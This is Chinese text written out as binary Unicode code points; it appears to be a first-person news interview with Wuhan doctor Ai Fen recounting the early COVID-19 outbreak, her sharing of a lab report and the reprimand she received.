101001111010111 100111010000110 11000000001100 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 11000000000001 100111000100101 101001110001001 111011010000100 110010110100101 1000110100100011 11000000001101 1111111100001100 111100111110000 101100101111001 110011000101111 100111101011100 100111000111010 100111000010011 100111000011010 100111010111010 101100011101011 101011100101000 1001000000100000 1000110000100011 11000000000010 1010 1010 110011 110011100001000 110010 110010111100101 100111000001011 101001101001000 1111111100001100 1000001001111110 1000001010101100 101011100101000 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 110001110100101 101001111010111 100111010000110 11000000001010 100111010111010 111001001101001 11000000001011 111011010000100 100111000010011 1000101110111111 11000000000010 101100101111001 100111000000000 100111000101010 100111010111010 101011101010000 101011100101000 110000000100101 1000101111001010 101101110100100 101001010011110 101000101101100 101101110100100 100111000101101 1111111100001100 110011011111110 111111011001111 100111000000000 101100100101001 110001110100101 1000101111001010 1000110110000101 1000111111000111 110001 110101 110000 110000 100111101001101 110000010100011 1000000000000101 111011010000100 110000000100101 1000101111001010 111100111010001 110101101100100 110010111110110 101110111110010 110000001100010 101100100001101 100111010000110 101101110001001 1001011101011001 1111111100001100 110000000100101 1000101111001010 101100100100111 101001110000101 1001000111001100 101001111101010 1000111010111010 111011101000000 100111000000000 101010000001101 110110101000001 110110101101010 110110001001001 11000000000010 1010 1010 110101101100100 101001001001101 111011010000100 100111000000000 100111010011011 110001010100101 1001000001010011 1111111100001100 
1000001001111110 1000001010101100 1000100010101011 111100111110000 100111000111010 11000000001100 101001111001000 100111000000000 100111000101010 1000100010101011 1000101110101101 1000101111101011 111011010000100 101100101110011 101001100111011 111010100011111 110110101101110 101000111111010 110110000110100 1001011101100010 11000000001101 1111111100001100 100111001011111 110011100001001 100111010111010 101110000000110 101100101111001 111100111110000 100111000111010 11000000001100 101010000111001 101010011101000 100111010111010 11000000001101 1111111100001100 1000001001111110 1000001010101100 111111010100000 110101101100011 100111010000110 1000111111011001 100111000101010 1000101111110100 110110011010101 1111111100001100 101100101111001 1000101111110100 1000000111101010 101110111110001 100111000001101 110011000101111 101010000111001 101010011101000 100111010111010 1111111100001100 110011000101111 1001000010100011 100111000101010 11000000001100 101001111010001 101010011101000 101101101010000 111011010000100 100111010111010 11000000001101 11000000000010 1001000111000111 1000101110111111 100111000101101 1111111100001100 1000001001111110 1000001010101100 110010101110000 110101100100001 110001111010000 1000110101110111 11000000001100 101010000001110 110000010010100 11000000001101 1000111111011001 100111000101010 1000101111001101 1111111100001100 101100101111001 101010000001110 110000010010100 101111101010011 101001000011101 1000100010101011 111111010100110 1000110000001000 101010000001110 110110010100001 110011100001001 111111011100111 111111011101101 101010000111001 101010011001101 101010011101000 101100011110000 1111111100001100 111001001111001 101001000101011 110011000101111 101101111111001 100111010001110 1000111111000111 100111000010110 111011010000100 101010000001100 100111010001011 1111111100001100 11000000001100 110010111101001 111011111100101 1001000001010011 110011100001001 100111011001010 101100100101001 1111111100001100 110001000010001 111101110100001 
100111011010110 110001001111001 1000101111000100 100111000001101 110001001111001 1000101111000100 1111111100001100 11000000001110 1000000000000001 101101101010000 11000000001111 101001000110000 101100100000100 1000101111110100 1111111100001100 110011000101111 100111000001101 110011000101111 1111111100011111 11000000001101 1010 1010 101000101110011 100111010001110 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 101010010001100 1000001001111110 1000001010101100 110011100101100 100111010111010 101011100101000 1000111111000111 101001110111011 111011010000100 100111000100100 100111000101010 101100100011010 110011100001000 100111000101101 101001000110000 101111010010101 111111011001111 101001110000110 100111010000110 100111011000000 100111001001000 1111111100011111 100111011100101 100111000001011 1111111100001100 110011000101111 1000001001111110 1000001010101100 111011010000100 1000101110110010 1000111111110000 10000000010100 10000000010100 1010 1010 1000001001111110 1000001010101100 1010 1010 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 1000101110101101 110010110100101 1010 1010 101001110111011 101111001110100 110001 110010 110011100001000 110001 110110 110010111100101 1111111100001100 110001000010001 100111011101100 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 110000000100101 1000101111001010 111100111010001 110001110100101 1000101111001010 100111010000110 100111000000000 100111101001101 111010111000101 100111010111010 11000000000010 1000001110101011 101010000001101 101000101110110 101100110011001 1001101011011000 111000011100111 1111111100001100 100111000000000 111011011110100 111010100101000 1000001101101111 1001000011111101 100111000001101 101100101111101 1111111100001100 100111101010011 110111000101001 101001010101000 1001000011111101 100111000001101 101001010101000 100111000000000 100111000001011 11000000000010 110010 110010 
101001111110111 101110000110001 1000111101101100 101001000110000 100111010000110 101010001111100 101010000111000 111100111010001 1111111100001100 101000001011010 100111010000110 111111010100100 111111011110100 110010100101111 110110000010100 111101110100001 1001010101011100 101001111010110 100111010000110 1000000010111010 110110011100001 111000001001100 110110100010111 110110110110010 1111111100001100 1001000000000001 101001110111011 101100100010110 1001011101100010 101000001011010 1001101011011000 1001000000011010 1001000111001111 110110101001011 101111010001111 1111111100001100 101010000001110 110011101100101 101001111100011 101100100110100 110001010100101 101000111111010 110011101100101 110011000101111 101000110100000 111001010110110 111010111000101 110101111010010 11000000000010 101111101010011 110010111110110 1111111100001100 101000101110111 100111101010011 111101110100001 101111010001010 111011010000100 101010000001100 100111010001011 101011100101000 110001000010001 1000000000110011 1000111110111001 101011010111100 100111010000110 101000111100000 1001000001001101 1111111100011010 1000001001111110 100111000111011 100111011111011 1111111100001100 1001000010100011 100111000101010 100111010111010 110001010100101 111011010000100 110011000101111 101000110100000 111001010110110 111010111000101 110101111010010 11000000000010 101010000001110 110011101100101 110001000010001 100111011101100 110001001001101 111011111100101 1001000001010011 1001000010100011 100111000101010 111010111000101 100111010111010 110011000101111 101011100101000 101001101001110 101001101010111 110110101110111 1001110010011100 101000001011010 100111010001011 111011010000100 11000000000010 1010 1010 111110100100111 110001110100101 111011101000000 110001 110010 110011100001000 110010 110111 110010111100101 1111111100001100 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 101001111001000 110011101100101 100111010000110 100111000000000 100111000101010 111010111000101 
100111010111010 1111111100001100 110011000101111 110001000010001 100111011101100 111100111010001 100111000000000 100111101001101 101001100111011 111010100011111 111011010000100 100111110000100 101000100111111 1111111100001100 110100 110000 101100100011010 101110010000001 1111111100001100 110110010100001 110011100001001 100111011111011 100111101010101 101011111111010 111100001000000 111010110111110 111010111000101 1111111100001100 1000000010111010 1001000011101000 100111000000000 101100001001100 111110011001010 110110110000010 1111111100001100 1000100001000000 110110000100111 1001100101110001 101010010001100 101001111101010 110011100001001 111001 110000 100101 1111111100001100 101011100101000 100111000001011 1001011101100010 101000101110110 100111011010110 101001100111011 1001011001100010 101110111110010 111111011001111 110110010111011 111010110010111 100111010000110 101110000000110 1000111111010001 110001 110000 101100100101001 101110111100110 101001111110011 1001000011111101 110110010100001 110011100001001 100111011111011 100111101010101 101100101111101 1000111101101100 1111111100001100 111010111000101 100111010111010 110010100110110 101001000110000 100111010000110 101010001111100 101010000111000 111100111010001 111011011010001 110001010100100 101101110100100 100111101001111 1001011001100010 11000000000010 101010000001100 110100000110111 101000001011010 100111010000110 111111010100100 111111011110100 110010100101111 110110000010100 111101110100001 1001010101011100 101001111010110 100111010000110 1000000010111010 110110011100001 111000001001100 110110100010111 110110110110010 1001000000000001 101001110111011 110100011000000 110110101001011 11000000000010 1010 1010 110001 110010 110011100001000 110011 110000 110010111100101 1001000010100011 101100100101001 100111000101101 101001101001000 1111111100001100 110001000010001 101011100101000 101010000001100 110110101001110 101001100111011 1001011001100010 101110111100101 100111101011100 111011010000100 101010000001100 
101101101100110 101001111010001 100111010000110 100111000000000 101111100100000 101111110101110 100111111100001 101101111111001 1000101111011101 110001000101010 101011011111110 111111011011001 110001000010001 1111111100001100 110001000101010 101011011111110 100111000001010 101000110011001 111011101000000 1111111100011010 11000000001100 110011100000000 1000111111010001 100111000001101 1000100110000001 101001110111011 101001101001110 101001101010111 101010101001010 1111111100001100 1001000010100011 1001000111001100 1000011011101110 101100100011010 100111010111010 1001101011011000 111000011100111 10000000100110 10000000100110 11000000001101 100111011010110 1001010111101110 110001000010001 110011000101111 100111000001101 110011000101111 111011100011111 111011010000100 1111111100001100 101111101010011 110010111110110 1111111100001100 110001000010001 110101101100011 101011100101000 111010100110101 1000000100010001 100111000001010 111011100001011 100111000000000 100111000101010 101111110001000 101000101111000 101011110001011 111011010000100 1000000010111010 1001000011101000 110000100011111 110011111010011 110000010100011 1000000000000101 111011010000100 1000011 1010100 1111111100001100 110001000010001 101110000110001 110001010001010 1000011 1010100 101111101010101 100111010000110 100111000000000 110101110110101 110001 110001 111100111010010 1001010010011111 111011010000100 1000100111000110 1001100010010001 100111100100000 111111011011001 100111011010110 1111111100001100 101010001001010 1000101111001001 100111011010110 1000111111011001 110011000101111 100111000001010 101001101001000 110011101100101 110001000010001 100111011101100 110000000100101 1000101111001010 111011010000100 100111000000000 100111000101010 111010111000101 100111010111010 1111111100001100 100111001011111 110011000101111 101001101001110 101001101010111 110110101110111 1001110010011100 101111000000010 101011100111010 111011010000100 11000000000010 1010 1010 101111101010011 101100100101001 100111000001011 
101001101001000 110100 111000010111001 101001000011010 1000111111000111 1111111100001100 101010000001100 100111010001011 111111011011001 110001000010001 111011100001011 100111010000110 100111000000000 100111011111101 110001010100101 101010001001010 1111111100001100 100111000001010 1001011101100010 101000110011001 111011010000100 110011000101111 1111111100011010 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000000001 111111011111111 1000000100010011 101000001000111 101001101010101 1000000011011110 1000001111001100 11000000000001 110100 110110 111100111001101 101001111100011 1000000101010100 101111 101010001111100 101010000111000 1001000001010011 101101110011010 110100100001101 1000001111001100 11000000000010 110001000010001 100111011010100 111111011000110 111011100001011 100111010000110 101111110001000 101100100011010 1001000001001101 110001010100101 101010001001010 1111111100001100 100111000001011 1001011101100010 111011010000100 110110011101000 1001000111001010 101000110011001 111011101000000 1111111100011010 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 110011000101111 100111000000000 111100111001101 101001101010101 1000000010100001 110101101100011 1001010011111110 1010010 1001110 1000001 111010111000101 110101111010010 11000000000010 1000101111100101 111010111000101 110101111010010 100111000111011 1000100110000001 100111100100000 110010010101101 110010110111001 101111100001111 100111000111010 1000111111010001 1000110111011101 111100110111011 1001100011011110 110110010101011 100111100100000 110010010101101 110001000010110 110001110100101 1000100111100110 110000010100011 1000000000000101 101010001111100 101010000111000 1001000001010011 101001000000110 110110011001100 111001001101001 1111111100001100 101001111101111 101111100010101 1000110101110111 111011010000100 100111000000000 111100111001101 101000101110111 110011100001001 110011000001110 110011000111110 
100111100100000 110011111010011 110000000100111 1111111100001100 101001111101111 111110100101111 101001111001010 101100100011010 100111000101010 1000000100001111 101011001101000 111110011111011 111111011011111 111011010000100 111001001111001 110101110001010 1000000010111010 111000010001110 1111111100001100 100111001011111 111100111110000 1001011101011110 101000101111000 101011110001011 1000000010111010 111000010001110 11000000000010 1010 1010 101111101010011 110010111110110 1111111100001100 110001000010001 101010000010011 101000111111010 100111010000110 100111000000000 1000111010101011 101000110110111 110110001010111 1111111100001100 1000111111011001 110011000101111 100111000000000 100111000101010 101111110001000 101001111101111 110000000010101 111011010000100 100111000011100 1000100101111111 11000000000010 111010111000101 100111010111010 110010100110110 101011100101000 101010001111100 101010000111000 111100111010001 1111111100001100 110001100001001 1001000001010011 111010000000110 101111010010100 1000101111100101 101010001111100 101010000111000 111100111010001 100111000001010 110001010100101 1000111111011001 100111000101010 110000011000101 101000110110101 1111111100001100 100111101000110 110011000101111 100111000111010 100111010000110 100111111011101 1001011001101001 101010010001100 1001000111001101 1000100111000110 1000110101110111 1000100111000001 1111111100001100 110001000010001 1000111111011000 110011000101111 111101011001011 101001000111011 110001001010011 111010100110101 1000101111011101 100111000001010 110001010100101 111111011011001 100111010000110 101001100111011 1001011001100010 101000101101100 101000101110001 101001101101011 111010100011111 111100111010001 101010010001100 1001011001100010 110000100011111 111100111010001 11000000000010 101111101010011 110010111110110 110001000010001 100111011101100 101001100111011 1001011001100010 101010001111100 101010000111000 111100111010001 100111000111011 100111011111011 110101101100011 101100101111101 
100111011001110 110001000010001 1001010111101000 101001111100011 1000111111000111 1111111100001100 100111011010110 110011000101111 101001111000010 101001010100000 1000111111000111 1001011101011110 101000101111000 111011010000100 100111010111010 1111111100001100 110001000010001 110001010001010 100111011010110 110001010010011 100111101001111 1111111100001100 1000101111110100 1111111100001100 110001000010001 100111011101100 110011100001001 100111000101010 111010111000101 100111010111010 110010100110110 101001000110000 100111101100000 100111011101100 111100111010001 101101110100100 1111111100001100 101001111010001 111001110110000 100111010000110 1000111111011001 100111000101010 100111000011100 1000100101111111 11000000000010 100111011010110 101111101010011 110010111110110 100111000000000 111011100001011 101110000110001 1000101111110100 1111111100001100 1001000010100011 101110000110001 1001111010111011 111000011100110 100111010000110 11000000000010 110001000010001 101110000110001 111011111100101 1001000001010011 1000111111011001 100111000101010 100111010001011 110000011000101 1001111010111011 111000011100110 100111010000110 11000000000010 1010 1010 111111011011001 101001100111011 1001011001100010 110001001010011 101101110001100 111010100110101 1000101111011101 1111111100001100 110001000010001 100111001011111 111111011011001 110001000010001 101010000001100 101101101100110 100111100100000 100111010000110 1000111111011001 100111011111101 110001010100101 101010001001010 1111111100001100 111001001111001 110000100001111 101011100101000 11000000001100 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000000001 111111011111111 1000000100010011 101000001000111 101001101010101 1000000011011110 1000001111001100 11000000000001 110100 110110 111100111001101 101001111100011 1000000101010100 101111 101010001111100 101010000111000 1001000001010011 101101110011010 110100100001101 1000001111001100 11000000001101 1000111111011001 
100111000000000 110001110010010 101101101010111 100111000001010 111010100111011 100111010000110 100111000101010 111111010100010 101011100001000 1111111100001100 111011011101110 111011010000100 110011000101111 110001111010000 1001000110010010 100111011010110 110110011101000 110000100001111 11000000000001 1001000111001101 1000100111000110 11000000000010 110001000010001 100111001011111 110001010001010 110001010100101 101010001001010 101001111010001 101011100101000 100111010000110 111100111010001 101101110100100 101001100111011 111010100011111 111111110100100 1001000111001100 1001011101100010 1111111100001100 110001111010000 1001000110010010 101100100100111 101101110110110 110110011101000 110000100001111 1001011000110010 1000001100000011 11000000000010 1010 1010 101111101010011 101100100101001 110011001011010 100111000001010 1111111100001100 1000111111011001 100111000101010 100111000011100 1000100101111111 101110000110001 100111100100000 1001000001001101 100111010000110 1111111100001100 101010000000100 101100100000100 100111100100000 111011010000100 110001000101010 101110001001111 1001000011111101 110011000101111 110001000010001 111010100111011 111111010100010 101011100001000 111011010000100 1001000010100011 100111000101010 111000101100111 111001001000111 1111111100001100 101001100000101 110001011101100 101010000001110 110011101100101 111011111100101 1001000001010011 110011101001110 110010110000111 100111010101110 100111100100000 101011100101000 111111110100100 1001000111001100 111011010000100 100111001011111 110011000101111 1001000010100011 100111011111101 11000000000010 110001000010001 101111111000011 1001000111001100 101111101010011 110010111110110 101110000110001 110000011110011 101001111101111 1000000011111101 101011101001111 100111010001011 101000100111111 100111010000110 11000000000010 110001 110000 111000010111001 110010 110000 1111111100001100 101001100111011 1001011001100010 101001111010001 110011101100101 100111010000110 100111111100001 110000001101111 
1111111100001100 110011000101111 1000111101101100 101111000000010 101001101101011 101000001100101 101100111010100 111011010000100 1001000000011010 111011111100101 1111111100001100 101100100100111 110000100001111 101110000110001 110011000101111 101000101110011 100111010001110 100111000001101 110011000001110 101001110011111 101011011100000 1000000010111010 111000010001110 1111111100001100 100111000001101 1000100110000001 1001011010001111 110000100001111 101101111111001 101100100010110 101001111010001 101111000000011 1111111100001100 1001000001111111 101000101001101 101111100010101 1000110101110111 111111110100100 100111100010111 110000001010000 110000101001100 1111111100001100 101100110000010 110011110011100 101011011100000 100111000111010 100111111100001 110000001101111 110110011000100 1001011100110010 101111100010101 101001111010001 110000001010000 110000101001100 1111111100001100 1000100110000001 1000111111111101 1000110100100011 11000000000010 1010 1010 110001000010001 101111101010011 110010111110110 101111111000011 1001000111001100 101110000110001 101111110001000 101101110110011 110000000010101 1111111100001100 111101011001011 101001000111011 110001010001010 1000111111011001 110011101100001 100111111100001 110000001101111 1000111101101100 111111011011001 100111010000110 110001000010001 101010000001100 101101101100110 11000000000010 1000111111000111 100111010000110 101100100100111 110100110000010 100111000000000 100111000101010 101110000001111 110010111110110 1111111100001100 101001100111011 1001011001100010 101001111001000 110011101100101 100111010000110 100111000000000 100111011111101 1001000000011010 111011111100101 1111111100001100 101000110001101 110101100100001 101111100111010 1000110000000011 111111110100100 101000110000101 111011010000100 111011011111000 101000101110011 110110110001000 110000001101111 100111000001101 1000000011111101 101100100010110 100111100100000 11000000000010 100111000000000 101100100101001 101010000001110 1111111100001100 110001 
110011100001000 110001 110010111100101 110011001011010 100111000001010 110001 110001 111000010111001 110100 110110 101001000000110 1111111100001100 101001100111011 1001011001100010 111011011010001 101101111011111 111100111010001 111100111010001 1001010101111111 111111011011001 110001000010001 101001111010001 100111010000110 110011101100001 110110110001000 110000001101111 1111111100001100 1000101110101001 110001000010001 111101100101100 100111010001100 101100100101001 110010111101001 100111000001010 1000111111000111 101001110111011 100111000000000 100111000001011 11000000000010 1010 1010 1001000010100011 100111000000000 110011001011010 100111000001010 110001000010001 1001000011111101 110110010100001 110011100001001 111011101100001 111011101000000 1111111100001100 101111110001000 110001011000101 101111111100111 1111111100001100 111111111111011 110011101100101 1000100110000110 101001110111011 101011100110000 110000011110011 1111111100001100 100111101000110 101001111001000 1000100111001001 101111110010111 101000111100001 100111010001011 110000000111011 110011100001001 100111000100100 1001011101100010 110000000100111 1111111100001100 101001101110011 100111110111111 1001000000100000 110001000010000 100111000001101 1000001001101111 101111101110001 101010011001101 1111111100001100 100111101000110 110001111010000 1001000110010010 110101101100110 110110001001001 111011010000100 101001100111011 101001010100001 100111010111010 101010001011000 110110011101000 110000100001111 1001011000110010 1000001100000011 100111001011111 100111000001101 100111000000000 101101110011010 110011000101111 100111000101010 101011101001111 100111010001011 11000000000010 111101100101100 100111010001100 101100100101001 110010111101001 100111000001010 111000 111000010111001 101100100011010 100111000000000 111000010111001 1111111100001100 1000111111011000 110110010100001 110011100001001 111101101001001 110001000010001 100111010100100 101101110001100 111001111101101 1111111100001100 101000010101100 
110001000010001 1000111111000111 101001110111011 111011010000100 111010100110101 1000101111011101 101110000110001 110001001010011 110011101100101 100111010000110 11000000000010 1010 1010 100111001001011 101010000001110 111011010000100 111111010100110 1000110000001000 1111111100001100 110001000010001 1001000001101101 101001111010111 100111010000110 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 11000000000001 1001011101011110 101111000111000 100111000100101 101001110001001 111011010000100 110010110100101 1000110100100011 11000000000010 1010 1010 101111101010011 110010111110110 1111111100001100 1000110000001000 1000101111011101 111011010000100 1001100010000110 101101111111100 1000101111110100 1111111100001100 11000000001100 110001000010001 100111011101100 101000111111010 101001110111011 101111100000000 100111100011010 1001000011111101 110001010101100 100111000001101 1000110101110111 101100100110100 1111111100001100 110011111010000 110011111010000 110011111010000 100111000111011 100111011111011 110001001111001 1000101111000100 110001000010001 100111011101100 101001100111011 1001011001100010 1001000010100011 100111000101010 1000001001111110 1000001010101100 1111111100001100 100111101011100 100111000111010 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 110000000100101 1000101111001010 111100111010001 100111000111011 100111011111011 1111111100001100 100111101100000 110011000101111 100111000010011 100111000011010 100111010111010 101100011101011 1111111100001100 110000000001110 100111001001000 1000000011111101 101100100011111 110110010100001 110011100001001 101001110011111 101001000011001 110110010100001 110011100001001 111111011000100 111111011000111 111111010101010 101111110001011 1001000000100000 1000110000100011 111010100011111 100111010001011 1111111100011111 11000000001101 1000111111011001 110011000101111 101001110011111 1000101111011101 11000000000010 1000101110101001 
111001000111000 111001000111000 101011100101000 110110001111101 1000111101100110 1001000111001100 1001011101100010 100111000001101 1000100001001100 100111010000110 1111111100001100 101011011100000 100111000111010 1001000010100011 110010111110110 101000000011001 101011100110000 100111000001011 1000111101100110 101111010010011 101110111110010 101110000000001 1111111100001100 100111011010110 1000111101100110 101101101010000 100111001011111 101100000110101 111011101000000 101111100000000 100111000001101 1000111111011011 110011101100101 11000000000010 110001000010001 110110010100001 101001010011110 110110011010101 1111111100001100 101111000100110 111011101000000 100111010111010 101010010001100 1000101110111110 101100100000111 1000110111010001 101001110111011 110110001111101 1000111101100110 1001000111001100 101001110111011 1111111100001100 100111000000000 111011100001011 1111111100001100 100111010111010 101110111110010 111111011001111 110101101111011 100111010000110 1111111100001100 100111101100000 1000101111110100 110011000101111 100111011000000 100111001001000 110000100011111 101001111010111 1111111100001100 101111110001000 1001011010111110 101001111010111 101111110001000 1001011010111110 101001111010111 11000000000010 1000111111011001 100111000101010 100111010111010 101110000110001 110101101111011 101011100101000 110110001111101 1000111101100110 1001000111001100 1111111100001100 1000111111011110 100111000001011 1000111101100110 111011010000100 110011100111010 100111100011010 1001000011111101 110110010100001 110011100001001 11000000000010 1010 1010 1000111111011000 110011100001001 100111000000000 100111101001101 1000000000000001 100111010111010 1111111100001100 1000000000000001 100111100110100 101001000011010 101011100101000 1001000111010001 1001010011110110 110111101101101 101001100111011 1001011001100010 101001110111011 100111000010110 100111010000110 1111111100001100 101100101111001 111011010000100 101000100111111 101101101010000 11000000000001 101100101110011 
101000100111111 1001000011111101 1000100010101011 110000100011111 110011111010011 100111010000110 1111111100001100 101011100101000 110001001010011 1001010010001000 1111111100001100 111000101100111 1001100001111110 101100101111001 111011010000100 110011000101111 101100101110011 101101001111111 1111111100001100 100111000000000 110011101100101 110001000010001 111011100001011 101100101111001 111010111000101 101111110010111 1001011101011110 101111000111000 1001000111001101 1111111100001100 1000000001010100 111110011111011 101010001111100 101010000111000 111100111010001 111111011011001 110010100110110 1000111111011011 101001110111011 100111101001111 1001011001100010 1111111100001100 101100101111001 101100101110011 101101001111111 100111000000000 111011100001011 101110000110001 110011000101111 100111000101010 110011100001001 110010110000111 101001100010110 110011100001001 111110100100000 1000110100101000 111011010000100 100111010111010 1111111100001100 1000111111000111 110011101100101 1000110111011111 110001000010001 1000101111110100 1000110000100010 1000110000100010 101001100111011 111010100011111 111101101001001 111101101001001 111011010000100 1111111100001100 110001000010001 101111111000011 1001000111001100 100111000000000 111110100100111 1111111100001100 1000101111110100 101111111101011 101001110111011 1111111100001100 110100000111001 110011100101100 1000000000111101 1000101111101111 100111000001101 100111010000110 100111010000110 11000000000010 111111011010011 110011110011100 1001000000000001 101001110111011 101110000110001 101001110111011 100111000010110 100111010000110 11000000000010 100111000000000 101001111100101 1000110000100010 1000110000100010 1000011001111101 111000100110110 101000111100000 111100111010010 1001010010011111 1111111100001100 100111101000110 100111001011111 1000000000111101 1000101111101111 100111010000110 101000111100000 111100111010010 11000000000010 1000111111011001 101001111100101 1000110000100010 1000110000100010 101001110001011 
101111110010111 110001000010001 101111110001000 110110010001001 1001000111001101 11000000000010 1010 1010 1000111111011000 110011100001001 101111110001000 101100100011010 100111010111010 110001010001010 1000000111101010 101110111110001 111011010000100 101101110110110 100111010111010 1001000000000001 101001000110000 111011011010001 110001010100100 101101110100100 111011010000100 110010111110110 101000000011001 1111111100001100 101110000110001 110011000101111 100111011010110 100111011101100 1000100111000001 111011010000100 110011100000000 101010000001110 100111000000000 1001011101100010 1111111100001100 100111101100000 110110000111000 1000111111011100 1000100111000001 100111000001101 111011101000000 100111010000110 11000000000010 1010 1010 110001000010001 1000101110110000 101111110010111 101100100100111 101111001110100 100111000001001 101001101000001 111011010000100 110010111101001 100111000001010 110001000010001 110011101100101 100111010100100 111001111101101 1111111100001100 110001000010001 1000101111110100 110001000010001 100111011101100 110011101100101 111000101100111 100111000101010 111011011111000 1111111100001100 111111010101010 101111111110101 100111000000000 100111000001011 1000111111011001 100111000101010 101100100100111 101111001110100 100111000001001 101001101000001 1111111100001100 1000111111011000 101001111010001 100111010000110 100111000101010 110011100001011 101001111001011 101011100001000 11000000000010 1001000010100011 101100100101001 1111111100001100 101100100100111 101101110110110 1001000011111101 110110010100001 110011100001001 1000101111110100 100111011000000 100111001001000 111100101011101 111100110001111 1111111100001100 1000111111011001 111100111001101 110010111110110 101000000011001 1111111100001100 110110100111011 111011101000000 101110000110001 110011000101111 101100101111101 111011010000100 11000000000010 1010 1010 100111011100101 101001001001101 1111111100001100 100111101100000 101100110000010 110011110011100 110011100001001 
100111000000000 111000010111001 101100100110001 1000101111101111 1111111100001100 110101111010100 101100110000010 110110010100001 110011100001001 101001111001010 110010111110110 110001001010011 1001010010001000 1111111100001100 111010111000101 100111010111010 1001000011111101 101001111101111 1000000011111101 1000111111011000 101001110111011 1001010111111001 1111111100001100 111001110110000 101011100101000 110110010100001 100111010111010 100111010000110 1111111100001100 110110010100001 110011100001001 100111010111010 1000110111011111 100111101100000 101010000110101 1111111100001100 110110010100001 110011100001001 100111010111010 1000110111011111 100111101100000 1001010111111001 100111010000110 1111111100001100 110001001000000 110011100001001 100111010111010 1001000011111101 1000100010101011 1000111111011001 111100111001101 111101010000001 111000100110110 110011101100101 111011010000100 110001001010011 101000111111011 101000111111011 101011110101110 100111010000110 1111111100001100 110010000011110 1000010010011001 100111010000110 11000000000010 1010 1010 111010111000101 100111010111010 110101101111011 100111010000110 1111111100001100 101111110001000 101110000010001 111011100001011 101001000110000 101101110110110 101110001011110 110011100001001 101111110001000 100111100100100 101111111000011 101011100110000 101010011101101 111011010000100 1111111100001100 101011011100000 100111000111010 101100100101010 101100100011010 100111010000110 1111111100001100 101100100101010 101100100011010 100111010000110 11000000000010 110011100001001 100111010011011 101101110110110 101110001011110 100111001011111 100111000001101 100111100011010 1000101111110100 101001100111011 111010100011111 110110001000010 110110001000010 100111101100000 110010101010001 110010101010001 110001000010001 111011010000100 101101110110110 100111010111010 1111111100001100 1000000000001100 110011000101111 1000110111011111 101001100111011 111010100011111 1000101111110100 1111111100001100 101010100001001 
1111111100001100 1001000010100011 101110000110001 101111111101011 111000010111001 1000100111100011 1000000100110001 101010000100111 1111111100001100 101110111110010 111111011001111 101001000110000 100111010000110 1000111111011001 100111000101010 101011100110000 110101101100101 11000000000010 101011011100000 100111000111010 1000111111011001 110010111110110 101000000011001 110101111001111 100111000101010 100111010111010 110000000010101 111011010000100 1001000011111101 110011000101111 1000000111101010 101110111110001 1000100010101011 110000100011111 110011111010011 11000000000010 1010 1010 100111000000000 101100100101001 101001111010001 111000011101101 1001010111101000 1000101111001010 1001010111101000 101001111100011 111011010000100 110001110010010 1001011000011111 1111111100001100 1000100110000001 110001110010010 110101 100111000101010 101110000001111 110010111110110 11000000000010 110101101100011 110001110010010 111011101000000 100111000000000 100111000101010 101100101110011 111011010000100 101000000010010 100111000001011 100111010000110 1111111100001100 111011100001011 101100101111001 111101001111111 111011101000000 111011010101110 1000100001100011 1111111100001100 1000000011001100 111011101000000 101001100000101 101001100000101 1111111100001100 111101001111111 111011101000000 1001101011011000 1000110111011111 1001011110001011 1111111100001100 101111010010100 1000101111100101 110011000101111 101111110001000 1000101110110010 111101001110110 111011010000100 100111000000000 100111000101010 100111000101101 101111001110100 101100101110011 110000000100111 1111111100001100 101001111101111 110011000101111 110110010100001 110011100001001 100111010111010 110010101100010 100111000001010 101001001001101 101001110111011 110001001110110 101100101111001 1111111100001100 101110000110001 101011100101000 101011100110000 100111000001010 1000111010111010 100111010000110 101111110001000 100111001000101 11000000000010 101001111101010 101111110010111 110001000010001 101001110111011 
101010110001010 110001010100100 101100011101011 11000000000001 101001100111011 111010100011111 110011101100101 101001110111011 110001001110110 101100101111001 11000000000010 1010 1010 110001 110011100001000 110011 110000 101001111110111 110001000010001 110010111101001 100111000001010 110011101100101 100111000001010 111001111101101 1111111100001100 100111000000000 100111000101010 111011001111101 101001111010001 1000000000000001 100111010111010 111011010000100 101000100111111 101101101010000 110011 110010 101110010000001 110101101111011 100111010000110 1111111100001100 100111011010110 101110000110001 111011011101111 111011101000000 111011100001011 101001100111011 111010100011111 111111011011001 100111011010110 101111100000000 110101101111011 100111010100001 1000101111000001 110011000001110 11000000000010 110100000111001 110011100101100 110110010100001 110011100001001 111011100111100 110110011101010 1111111100001100 110000000001110 100111001001000 101010011101101 1111111100011111 110110010100001 101001010011110 110110011010101 101010011101101 11000000000010 111011100001011 100111011010110 111011010000100 110001001010011 110001001101110 1111111100001100 101001111101111 1000000011111101 101110000110001 110011000101111 100111000000000 100111000101010 101100100010110 110011101100101 111011010000100 110001001010011 101110111100101 111011010000100 1111111100001100 110110010100001 110011100001001 100111011111011 100111101010101 110111000100000 1001000001010011 101001110111011 101001111001101 110011000100000 11000000000010 110110010100001 110011100001001 111100001101110 1000101111001010 1111111100001100 100111011010110 111011010000100 101000100111111 101101101010000 1111111100001100 101110000110001 101001111011000 110001000010000 100111010000110 100111000000000 101111100100000 110101101111011 100111010100001 1000101111000001 110011000001110 11000000000010 1010 1010 1000111111011001 100111001011111 110011000101111 110001000010001 110000011110011 1000100110000001 
